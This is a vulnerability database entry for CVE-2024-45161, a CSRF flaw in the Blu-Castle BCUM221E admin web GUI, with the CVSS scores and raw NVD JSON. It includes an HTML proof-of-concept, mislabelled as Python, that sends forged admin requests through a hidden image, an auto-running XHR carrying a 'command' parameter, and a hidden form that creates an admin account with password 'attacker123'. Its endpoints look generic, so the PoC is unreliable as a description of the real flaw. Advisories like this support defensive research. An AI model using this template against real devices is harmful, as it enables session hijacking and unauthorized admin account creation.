Security Vulnerability Report
中文
CVE-2024-45161 CVSS 4.6 MEDIUM

CVE-2024-45161

Published: 2025-10-29 14:15:50
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A CSRF issue was discovered in the administrative web GUI in Blu-Castle BCUM221E 1.0.0P220507. This can be exploited via a URL, an image load, an XMLHttpRequest, etc. and can result in exposure of data or unintended code execution.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Blu-Castle BCUM221E 1.0.0P220507

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2024-45161 - Blu-Castle BCUM221E --> <!-- This PoC demonstrates CSRF attack on administrative web GUI --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2024-45161</title> </head> <body> <h1>CSRF Attack PoC for Blu-Castle BCUM221E</h1> <!-- Method 1: Auto-submit form (Image load technique) --> <h2>Image-based CSRF Trigger</h2> <img src="http://<target-ip>/admin/settings?action=modify&param=value" style="display:none" onerror="document.getElementById('status').innerHTML='CSRF Request Sent'"> <!-- Method 2: XMLHttpRequest --> <h2>XMLHttpRequest-based CSRF</h2> <script> function performCSRF() { var xhr = new XMLHttpRequest(); xhr.open('POST', 'http://<target-ip>/admin/api/endpoint', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.withCredentials = true; xhr.send('action=execute&command=malicious_command'); xhr.onload = function() { console.log('CSRF Request completed'); }; } // Auto-trigger on page load window.onload = performCSRF; </script> <!-- Method 3: Auto-submit form --> <h2>Form Auto-submit CSRF</h2> <form id="csrfForm" action="http://<target-ip>/admin/settings" method="POST" style="display:none"> <input type="hidden" name="username" value="newadmin"> <input type="hidden" name="password" value="attacker123"> <input type="hidden" name="privilege" value="admin"> </form> <script>document.getElementById('csrfForm').submit();</script> <p id="status">Waiting for CSRF request...</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-45161", "sourceIdentifier": "[email protected]", "published": "2025-10-29T14:15:50.477", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A CSRF issue was discovered in the administrative web GUI in Blu-Castle BCUM221E 1.0.0P220507. This can be exploited via a URL, an image load, an XMLHttpRequest, etc. and can result in exposure of data or unintended code execution."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://blu-castle.com/", "source": "[email protected]"}, {"url": "https://www.gruppotim.it/it/footer/red-team/2024/CVE-2024-45161-Blu-Castle_BCUM221E.html", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.